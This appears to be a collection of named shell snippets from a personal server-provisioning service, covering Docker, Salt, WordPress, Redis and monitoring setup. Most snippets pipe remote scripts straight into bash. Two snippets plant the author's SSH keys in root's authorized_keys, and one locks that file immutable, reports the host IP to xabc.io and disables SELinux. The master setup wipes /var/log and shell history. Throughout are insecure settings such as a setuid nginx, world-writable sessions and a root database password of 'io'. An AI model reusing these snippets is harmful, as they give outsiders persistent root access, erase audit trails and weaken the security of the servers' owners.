XABC75.101.220.230
filelistrb pgrep filelist.py|xargs kill -9 &>/dev/null sleep 1;cd /home/ywgx/1/filelist/;./filelist.py &>/home/ywgx/logs/filelist.log & ps aux|grep filelist|grep -v grep
docker yum install -y yum-utils yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo yum install -y docker-ce docker-ce-cli containerd.io docker-compose systemctl start docker docker run hello-world #docker rmi $name 删除镜像 #docker build -t ywgx/test . 使用Dockerfile文件 build 构建一个镜像 #docker tag $container_id ywgx/test:dev 为镜像添加一个新的标签 #docker search $name 查询镜像 #docker export $container_id > container.tar 导出容器 $docker rm -f $container_id 删除容器 #docker run -d -p 80:5000 training/webapp python app.py 后台启动容器并映射本地端口 80 #docker port $container_id 或者 $name 查看容器端口 #docker logs -f $container_id 查看容器内部标准输出 #docker top $name 查看容器内部运行的进程 #cat container.tar | docker import - centos:v1 导入容器到镜像 centos:v1 #docker inspect $name 检查容器的配置和状态信息 #docker exec -it $container_id /bin/bash 进入容器
dl [ -d /srv/zero/1 ]||mkdir -p /srv/zero/1 wget -q https://s.xabcstack.com/matrix/dl.tgz -O -|tar xzf - -C /srv/zero/1 pgrep dl.py|xargs kill -9 sleep 2 /srv/zero/1/dl/dl.py &>/dev/null &
chrony cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y install epel-release yum -y install chrony systemctl enable chrony fi if [ "$OS" = "Debian" ];then apt-get -y install chrony chkconfig --add chronyd fi timedatectl set-timezone Asia/Shanghai
s if ! grep -q "QmNkqIhy" /root/.ssh/authorized_keys &>/dev/null;then [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCciOA6PlTAAzYjSoavHXB+xyBG6PmhFumTPI7xrwsZfU/QjDxr3f/Q9x4RaqrQ+5i/wqxX00/ztR37WLza/6zn7gm06XqMMyZ4pdthxoJNS5eOKAXst8z1vTZsEIPY3ZzlQmNkqIhyUwcsc+4elHXdNB3DPxuxNYY8N7oHgZ7NYydZGHmPugpIjnAcDDh2llJ+RlO/oHnrU84gGAPtmf0me45TgFqDQj1sFzdAWB5iaChEq+/9t4B1vK78yM7zt3jDZfXoqdV/bB4DWaUB8X9WsgwTyrJflzzpsJSI1EhUgVAP6X0h13hR3tiyE3Xjksnc6Qbqu+JFm6e+opHf4+bn ywgx@E" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys fi
master curl -s xabc.io/b|bash curl -s xabc.io/v|bash yum -y install epel-release yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync [ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local timedatectl set-timezone Asia/Shanghai hostnamectl --static set-hostname master-75.101.220.230; systemctl disable firewalld curl -s xabc.io/py3b|bash yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum clean expire-cache yum -y install salt-master yum -y install salt-ssh yum -y install ansible /usr/bin/pip3 install redis flask cryptography pyinotify systemctl enable iptables.service systemctl enable salt-master.service [ -d /opt/sys ]||mkdir -p /opt/sys [ -d /opt/master ]||mkdir -p /opt/master [ -d /srv/salt ]||mkdir -p /srv/salt [ -d /srv/reactor ]||mkdir -p /srv/reactor [ -d /etc/sysconfig ]||mkdir -p /etc/sysconfig [ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin [ -d /root/.pip ]||mkdir -p /root/.pip [ -d /srv/pillar ]||mkdir -p /srv/pillar [ -d /root/.xabc ]||mkdir -p /root/.xabc [ -d /etc/ansible ]||mkdir -p /etc/ansible [ -d /srv/salt/src ]||mkdir -p /srv/salt/src [ -d /etc/sysctl.d ]||mkdir -p /etc/sysctl.d [ -d /srv/salt/files ]||mkdir -p /srv/salt/files [ -d /srv/salt/group ]||mkdir -p /srv/salt/group [ -d /etc/salt/master.d ]||mkdir -p /etc/salt/master.d [ -d /srv/salt/base/files ]||mkdir -p /srv/salt/base/files [ -d /srv/salt/open/files ]||mkdir -p /srv/salt/open/files [ -d /srv/zero/1/webhook ]||mkdir -p /srv/zero/1/webhook [ -d /srv/zero/1/prometheus/rules ]||mkdir -p /srv/zero/1/prometheus/rules [ -d /srv/zero/1/prometheus/conf/node ]||mkdir -p /srv/zero/1/prometheus/conf/node [ -d /srv/zero/1/prometheus/conf/http ]||mkdir -p /srv/zero/1/prometheus/conf/http [ -d /srv/zero/1/prometheus/conf/ping ]||mkdir -p /srv/zero/1/prometheus/conf/ping [ -d /srv/zero/1/prometheus/conf/tcp ]||mkdir -p /srv/zero/1/prometheus/conf/tcp wget -q -t 3 https://s.xabcstack.com/master/xabc.sh -O /etc/profile.d/xabc.sh wget -q -t 3 https://s.xabcstack.com/master/pip.conf -O /root/.pip/pip.conf wget -q -t 3 https://s.xabcstack.com/master/.bashrc -O /root/.bashrc wget -q -t 3 https://s.xabcstack.com/files/telnet.py -O /usr/local/bin/telnet.py wget -q -t 3 https://s.xabcstack.com/master/xabcdl -O /usr/local/bin/xabcdl wget -q -t 3 https://s.xabcstack.com/redis/redis-cli -O /usr/local/bin/redis-cli wget -q -t 3 https://s.xabcstack.com/master/redisdl -O /usr/local/bin/redisdl wget -q -t 3 https://s.xabcstack.com/master/iptables -O /etc/sysconfig/iptables wget -q -t 3 https://s.xabcstack.com/master/master -O /etc/salt/master wget -q -t 3 https://s.xabcstack.com/master/Saltfile -O /etc/salt/Saltfile wget -q -t 3 https://s.xabcstack.com/master/reactor.conf -O /etc/salt/master.d/reactor.conf wget -q -t 3 https://s.xabcstack.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero wget -q -t 3 https://s.xabcstack.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero wget -q -t 3 https://s.xabcstack.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1 wget -q -t 3 https://s.xabcstack.com/master/redis.conf -O /srv/zero/2/redis/conf/redis.conf wget -q -t 3 https://s.xabcstack.com/master/nginx.conf -O /srv/zero/0/openresty/nginx/conf/nginx.conf wget -q -t 3 https://s.xabcstack.com/master/rc.local -O /etc/rc.d/rc.local wget -q -t 3 https://s.xabcstack.com/master/xabc-sysctl.conf -O /etc/sysctl.d/xabc.conf wget -q -t 3 https://s.xabcstack.com/master/genkey.py -O /opt/sys/genkey.py wget -q -t 3 https://s.xabcstack.com/master/kk.py -O /srv/zero/bin/kk.py wget -q -t 3 https://s.xabcstack.com/master/air.py -O /srv/zero/bin/air.py wget -q -t 3 https://s.xabcstack.com/master/sentinel.py -O /srv/zero/bin/sentinel.py wget -q -t 3 https://s.xabcstack.com/master/webhook.py -O /srv/zero/1/webhook/webhook.py wget -q -t 3 https://s.xabcstack.com/master/.prometheus.yml -O /srv/salt/files/.prometheus.yml wget -q -t 3 https://s.xabcstack.com/master/.alertmanager.yml -O /srv/salt/files/.alertmanager.yml wget -q -t 3 https://s.xabcstack.com/master/top.sls -O /srv/salt/top.sls wget -q -t 3 https://s.xabcstack.com/master/pillar_top.sls -O /srv/pillar/top.sls wget -q -t 3 https://s.xabcstack.com/master/custom.sls -O /srv/salt/base/custom.sls wget -q -t 3 https://s.xabcstack.com/master/conf.py -O /srv/zero/1/webhook/conf.py for i in blackbox_exporter.tgz node_exporter.tgz gpu_exporter.tgz;do wget -t 3 https://s.xabcstack.com/src/$i -O -|tar xzf - -C /srv/salt/src;done ln -s /srv/salt/files/.prometheus.yml /srv/zero/1/prometheus/prometheus.yml ln -s /srv/salt/files/.alertmanager.yml /srv/zero/1/prometheus/alertmanager/alertmanager.yml ln -s /srv/salt/files/.node_exporter_rules.yml /srv/zero/1/prometheus/rules/node_exporter_rules.yml ln -s /srv/salt/files/.blackbox_exporter_rules.yml /srv/zero/1/prometheus/rules/blackbox_exporter_rules.yml ln -s /srv/salt/files/node_exporter_targets.yml /srv/zero/1/prometheus/conf/node/node_exporter_targets.yml chmod +x /opt/sys/genkey.py /srv/zero/1/webhook/webhook.py /srv/zero/bin/kk.py /srv/zero/bin/sentinel.py /srv/zero/bin/air.py /etc/rc.local /etc/rc.d/rc.local [ -e /srv/salt/base/files/cluster_id_rsa ]||/opt/sys/genkey.py id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx chmod +x /usr/local/bin/redis-cli /usr/local/bin/redisdl /usr/local/bin/xabcdl /usr/local/bin/telnet.py [ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key rm -rf /var/log /var/cache/salt/minion /root/.bash_history;mkdir -p /var/log chattr -ai /var/spool/cron/root &>/dev/null echo -e "31 05 * * 1 find /root/.ssh/ /home/*/.ssh/ -name known_hosts -delete\n*/5 * * * * pgrep redis-server||(/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf)\n*/5 * * * * pgrep sentinel.py||(/srv/zero/bin/sentinel.py &>>/var/log/xabc.log &)\n*/5 * * * * pgrep webhook.py||(/srv/zero/1/webhook/webhook.py &>>/var/log/webhook.log &)\n*/5 * * * * pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &)\n17 03 * * * /srv/zero/bin/air.py" > /var/spool/cron/root pgrep redis-server||/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf /srv/zero/bin/air.py
r echo doing... curl -s xabc.io/b|bash curl -s xabc.io/e|bash curl -s xabc.io/v|bash cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" wget -t 3 https://s.xabcstack.com/src/redis.tgz -O -|tar xzf - -C /tmp mv /tmp/redis/files/redis-$OS /opt/redis rm -rf /tmp/redis/ mkdir -p /opt/redis/conf wget -t 3 https://s.xabcstack.com/files/redis.conf -O /opt/redis/conf/redis.conf chmod 100 /opt/redis/bin/* pgrep redis||/opt/redis/bin/redis-server /opt/redis/conf/redis.conf ps aux|grep redis
wp yum -y remove webtatic-release-7-3.noarch yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm yum -y remove php72w-mysql yum -y install php72w-mysqlnd chmod 777 /var/lib/php/session/ wget -t 3 https://s.xabcstack.com/files/phpmyadmin.tgz -O -|tar xzf - -C /opt/wordpress chown nobody.nobody -R /opt/wordpress/phpmyadmin echo "user:root password:io"
n hostnamectl --static set-hostname
wordpress cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" chattr -ai /etc/passwd /etc/shadow /etc/group /etc/gshadow id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null if [ "$OS" = "RedHat" ] then yum -y install yum-utils yum -y install epel-release yum -y install vim wget bzip2 unzip rsync yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm wget -t 3 https://s.xabcstack.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo yum -y install MariaDB-server MariaDB-client yum -y install php72w yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo systemctl start mariadb [ -d /etc/rc.d ]||mkdir -p /etc/rc.d [ -d /etc/php-fpm.d ]||mkdir -p /etc/php-fpm.d wget -t 3 https://s.xabcstack.com/files/RedHat-php.conf -O /etc/php-fpm.d/www.conf wget -t 3 https://s.xabcstack.com/files/wordpress-rc.local.conf -O /etc/rc.d/rc.local wget -t 3 https://s.xabcstack.com/files/mysql-server.cnf -O /etc/my.cnf.d/server.cnf chmod 755 /etc/rc.d/rc.local mysql <<- EOF set password for root@localhost=password('io'); create database wordpress; EOF systemctl restart mariadb systemctl restart php-fpm systemctl enable mariadb systemctl enable php-fpm fi if [ "$OS" = "Debian" ] then apt-get -y update apt-get -y install vim wget bzip2 unzip rsync apt-get -y remove apache2 apt-get -y install php7.[0-9] apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc apt-get -y install mysql-server --allow-unauthenticated mysql -pio<<- EOF create database wordpress; EOF wget -t 3 https://s.xabcstack.com/files/Debian-php.conf -O `find /etc/php/ -name www.conf` wget -t 3 https://s.xabcstack.com/files/wordpress-rc.local.conf -O /etc/rc.local chmod 755 /etc/rc.local systemctl restart mysql /etc/init.d/php*-fpm restart fi [ -d /opt/sys ]||mkdir -p /opt/sys [ -d /var/log/php-fpm ]||mkdir -p /var/log/php-fpm [ -d /var/log/mariadb ]||mkdir -p /var/log/mariadb wget -t 3 https://s.xabcstack.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt wget -t 3 https://s.xabcstack.com/files/wordpress-nginx.conf -O /opt/openresty/nginx/conf/nginx.conf wget -t 3 https://s.xabcstack.com/files/wordpress.tgz -O -|tar xzf - -C /opt wget -t 3 https://s.xabcstack.com/files/wordpress-start.sh -O /opt/sys/wordpress-start.sh chown -R nobody.nobody /opt/openresty chown -R nobody.nobody /opt/wordpress chown root.nobody /opt/openresty/nginx/sbin/nginx chmod +xs /opt/openresty/nginx/sbin/nginx chmod 700 /opt/sys/wordpress-start.sh pgrep nginx||/opt/openresty/nginx/sbin/nginx
php cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm yum -y install php72w yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo fi if [ "$OS" = "Debian" ];then apt-get -y install php7.[0-9] apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc fi
w echo wordpress
mongo echo doing... wget -t 3 https://s.xabcstack.com/mongodb/mongo.tgz -O -|tar xzf - -C /opt echo 65535 > /proc/sys/net/core/somaxconn echo never > /sys/kernel/mm/transparent_hugepage/defrag echo never > /sys/kernel/mm/transparent_hugepage/enabled pgrep mongod||/opt/mongo/bin/mongod -f /opt/mongo/conf/mongod.conf
ssh mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bk wget -t 3 https://s.xabcstack.com/files/sshd_config -O /etc/ssh/sshd_config systemctl restart sshd.service
to tail -f access.log|awk '$2 > 2 {print $0}'
y ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|grep -E '^10\.|^100\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1
v wget -t 3 https://s.xabcstack.com/ywgx/vim.tgz -O -|tar xzf - -C ~
uninstall cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ] then yum -y erase fi if [ "$OS" = "Debian" ] then echo hello fi
filelist0 yum update -y pip3 install bson markdown pyaml pyyaml numpy pymongo redis uvloop tornado markdown apscheduler psutil requests orderedset tqdm aredis aiomysql motor bs4 lxml requests_toolbelt aio_pika pika selenium aiosmtplib
prb pgrep prometheus|xargs kill -9 pgrep blackbox|xargs kill -9 pgrep alertmanager|xargs kill -9 sleep 2 pgrep alertmanager||(/srv/zero/1/prometheus/alertmanager/alertmanager --config.file=/srv/zero/1/prometheus/alertmanager/alertmanager.yml --cluster.listen-address='' --storage.path=/srv/zero/1/prometheus/alertmanager/data &>/srv/zero/1/prometheus/logs/alertmanager.log &) pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &) pgrep prometheus||(/srv/zero/1/prometheus/prometheus --config.file=/srv/zero/1/prometheus/prometheus.yml --storage.tsdb.path=/srv/zero/1/prometheus/data --web.enable-lifecycle &>/srv/zero/1/prometheus/logs/prometheus.log &)
filelist1 chattr -ai /etc/passwd /etc/shadow /etc/group /etc/gshadow useradd ywgx id -u nobody &>/dev/null||useradd nobody -r -s /bin/false id -u nobody &>/dev/null||useradd nobody -r -s /bin/false [ -e /etc/profile.d/ywgx.sh ]||wget -t 3 https://s.xabcstack.com/ywgx/ywgx.sh -O /etc/profile.d/ywgx.sh [ -e /etc/profile.d/filelist.sh ]||wget -t 3 https://s.xabcstack.com/filelist/filelist.sh -O /etc/profile.d/filelist.sh curl -s xabc.io/b|bash curl -s xabc.io/py3b|bash wget -q https://s.xabcstack.com/files/lib-libcurl.tgz -O -|tar xzf - -C /usr/local/lib ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4.3.0 ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4
tcp netstat -n|awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
py3 cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl yum -y install zlib-devel libffi-devel openssl-devel fi if [ "$OS" = "Debian" ];then apt -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential apt -y install zlib1g-dev libffi-devel libssl-dev fi PYTHON_VER=3.8.3 mkdir -p /tmp/build&&cd /tmp/build wget -t 3 https://s.xabcstack.com/python/Python-$PYTHON_VER.tgz -O -|tar xzf - cd Python-$PYTHON_VER #./configure --enable-optimizations ./configure make && make install pip3 install bson markdown pyaml pyyaml numpy pymongo redis uvloop pip3 install aiosmtplib pip3 install tornado rm -fr /tmp/build
pandas import pandas as pd pd.set_option('display.max_rows', 10000) #最大行数 pd.set_option('display.max_columns', 1000) #最大列数 pd.set_option('display.width', 10000) #页面宽度
tools cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ] then yum -y install vim wget bzip2 unzip rsync bash-completion git tmux inotify-tools axel jq fi if [ "$OS" = "Debian" ] then apt-get -y insall vim wget bzip2 unzip rsync git tmux inotify-tools luajit jq fi
os cat /etc/issue* /etc/*release
ssl proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header X-Forwarded-For $remote_addr; proxy_set_header X-NginX-Proxy true; proxy_set_header Connection ""; log_format main "$status $request_time $request_method $host$request_uri [$http_user_agent] [$time_local] [$http_x_forwarded_for $remote_addr] $http_referer"; access_log logs/access.log main; ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4:!DH:!DHE; ssl_protocols TLSv1.1 TLSv1.2 TLSv1.3; ssl_prefer_server_ciphers on; upstream EX{ keepalive 64; server 127.0.0.1:7001; } server{ listen 80; listen 443 ssl http2; server_name EX; ssl_certificate ssl/EX.pem; ssl_certificate_key ssl/EX.key; location /{ proxy_pass http://EX; } }
city curl -s --connect-timeout 5 https://ipinfo.io/75.101.220.230/city;curl -s --connect-timeout 5 http://freeapi.ipip.net/75.101.220.230
err tail -f access.log|awk '$1 > 399 {print $0}'
influxdb echo doing... curl -s xabc.io/b|bash curl -s xabc.io/e|bash curl -s xabc.io/v|bash cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" INFLUXDB_VER=1.7.8 if [ "$OS" = "RedHat" ] then yum -y install yum-utils yum -y localinstall https://s.xabcstack.com/files/influxdb-${INFLUXDB_VER}.x86_64.rpm wget -t 3 https://s.xabcstack.com/file/influxdb.repo -O /etc/yum.repos.d/influxdb.repo fi if [ "$OS" = "Debian" ] then wget -t 3 https://s.xabcstack.com/files/influxdb_${INFLUXDB_VER}_amd64.deb dpkg -i influxdb_${INFLUXDB_VER}_amd64.deb rm -f influxdb_${INFLUXDB_VER}_amd64.deb fi
a if ! grep -q "ge4MSI5hlWSw" /root/.ssh/authorized_keys &>/dev/null;then [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDHZyWeFOHuHtLgsGLNx4sCYVXv/FfFi3ZcTSOSyX2oRgRm4xflPDgJHGSlCjtP2IluM6gG+o9+fS0WpcQkiaabe4wJVf5/hdFvJY7BgG4SslmdYGGtXKqFKXLq0pkuQQTnitBYQvAwEjBuHYB0KuuJG1XSss3ubzTZzoveeIVOJgamoGgm42D2G0ZOAH7ovRj3eFvjJImepaSJEDUe1SbNHoptSQvLMV+y5LDNb7xxRUk4hH09o/f2O9jxPbxL8f9nP94ZoT2XjVhvKRKVz51AHs9pNTry7ge4MSI5hlWSwjiFO+jJLuIiGdRGVxEzToMOkPBaH3HXs1pJHu+/9fqCwvgW4+Wp7FTBhPmX/9VSjGpO+uwlj3zRZHyDxs3Enup+Bok/WH9e5GLQj/KzWQD6s/6s0/9UC9YfZRU7E+uRvXf21zpAkmaGGQsOv5FV7ZqciYRn66dq65ahx2xmi4hkBoTrdP595lRPuQEOW1ziTI08pxU9eZA/f/s4AsQL/IHU9LkiA8gqGXlembuBxL20OietQTLn5AYev6rmU0m4IZ1yKu2AzT5gaG//8XuSGzT0o8ppvSgIalDBnS+W/2xQCc0xGY7yX51MIdc+E7edWw14VqL0ESXIHZfB7uOGOAMjfMP3GIoHOIatI+rsd8D30sKEEBXDYAgwu2yZgskGmw== ywgx" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys chattr +ai /root/.ssh/authorized_keys fi if ! grep -q "Ogsuw71ublt" /root/.ssh/authorized_keys &>/dev/null;then [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDT36lNbtc7eqPC6KrrGoOJm43cGrTkLBfNJPuUVR7odSMBn53P5vjuG4BVeXP/yhiVAjerPrh/03e5xOoI5X1UD56H52XpXLoMkGGAR6uSRSNzjSgt1XBFREWBnOgsuw71ubltsfHKPBjnkwnMRePLD5aoMeTyvylhAxTMMLm3GPSCCTMII8bmuxTx8k1IJ8oW078ak6LeBOFFl/SOFiMeWSvqA21fi8gUMhWte3NN4trNUIDPdSprOZx1Yk4nnZh5jkrVv5iZX3DtrsaVhYegwK06VBRiycqDj32d1kOWyFBdhWHADMMoD4UAHnFxn+5igeRyS2yI9XFgQTQDaWw+cLvYe4wYr+pJ66Vk4v5f1AeOg/F4UewhJ4Sr/2AtZJOxgAhPv7gdyf4aDePfxlZwuUD+chMbntOZzUuaI5rU8uh4lWaNCG0eGvH0ul3pjS2p4FKJ378XKi87DcqGQLZJytjbMqc8NalTl/AbbMgjZbB8ZHpZAl2G1gq1uicAjMsm0j0nLmvAb6vPe9lQTp0Jb09yddM3VX9XtF15yz1Si1COu1I5nldEGc12nBFLxIRBEk6vaDZYo5gY14rdrWuiZ85j5I0vEUbiuFF3lzf+j0iHg3UgZcuYo5QFBiApyyWt1wDvHKnLE3FZVj0uSzscmZ5/4rk06ZAwCdwjzAXZCQ== xabc" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys chattr +ai /root/.ssh/authorized_keys fi curl -d "msg=# ssh 75.101.220.230" "https://xabc.io/send/ssh/" &>/dev/null which setenforce &>/dev/null&&setenforce -1 &>/dev/null [ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config
sredis BUILD=/tmp/ywgx [ -d $BUILD ]||mkdir -p $BUILD cd $BUILD wget -t 3 http://download.redis.io/redis-stable.tar.gz -O -|tar xfz - cd redis*/ cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ] CC=clang make fi if [ "$OS" = "Debian" ] CC=clang make MALLOC=libc fi #cd src/ #for i in `find . -perm -0755 -a ! -type d`;do mv $i $REDIS_BIN/;done
b cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ] then yum -y install vim wget bzip2 unzip rsync psmisc net-tools bind-utils telnet bash-completion fi if [ "$OS" = "Debian" ] then apt-get -y install vim wget bzip2 unzip rsync psmisc net-tools dnsutils telnet fi
mac #scutil --set ComputerName "E" #scutil --set LocalHostName "E" #scutil --set HostName "E" #nvram AutoBoot=%00 关闭开盖启动 #nvram AutoBoot=%03 恢复开盖启动 #sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool FALSE 删除开机界面上的 “其他”用户登陆选项 #pwpolicy -clearaccountpolicies 运行后,可以设置2位密码
dlloadrb pgrep dlload.py|xargs kill -9 &>/dev/null sleep 1;cd /home/ywgx/1/dlload/;./dlload.py &>/home/ywgx/logs/dlload.log & ps aux|grep dlload|grep -v grep
e wget -q https://s.xabcstack.com/ywgx/ywgx.sh -O /etc/profile.d/ywgx.sh;chmod 644 /etc/profile.d/ywgx.sh
c1 curl -s xabc.io/b|bash curl -s xabc.io/v|bash timedatectl set-timezone Asia/Shanghai yum -y install epel-release yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync [ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local hostnamectl --static set-hostname central-75.101.220.230; systemctl disable firewalld yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum clean expire-cache yum -y install salt-master yum -y install salt-minion yum -y install salt-ssh pip3 install redis flask cryptography pyinotify systemctl enable iptables.service systemctl enable salt-master.service [ -d /srv/salt ]||mkdir -p /srv/salt wget -t 3 https://s.xabcstack.com/master/iptables -O /etc/sysconfig/iptables wget -t 3 https://s.xabcstack.com/master/master -O /etc/salt/master systemctl restart salt-master.service [ -d /srv/zero/0 ]||mkdir -p /srv/zero/0 [ -d /srv/zero/1 ]||mkdir -p /srv/zero/1 [ -d /srv/zero/2 ]||mkdir -p /srv/zero/2 [ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin wget -t 3 https://s.xabcstack.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0 wget -t 3 https://s.xabcstack.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1 wget -t 3 https://s.xabcstack.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2
k8s #https://kubernetes.io/docs/tasks/tools/install-minikube/ yum install -y conntrack [ -e /usr/local/bin/kubectl ]||wget -t 3 https://s.xabcstack.com/k8s/kubectl -O /usr/local/bin/kubectl [ -e /usr/local/bin/minikube ]||wget -t 3 https://s.xabcstack.com/k8s/minikube -O /usr/local/bin/minikube chmod +x /usr/local/bin/kubectl /usr/local/bin/minikube
g salt \* saltutil.sync_grains
base cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y install epel-release yum -y install bash-completion yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang yum -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools bind-utils telnet openssh-clients pcre openssl fi if [ "$OS" = "Debian" ];then apt-get -y update apt-get -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential clang apt-get -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools dnsutils telnet fi
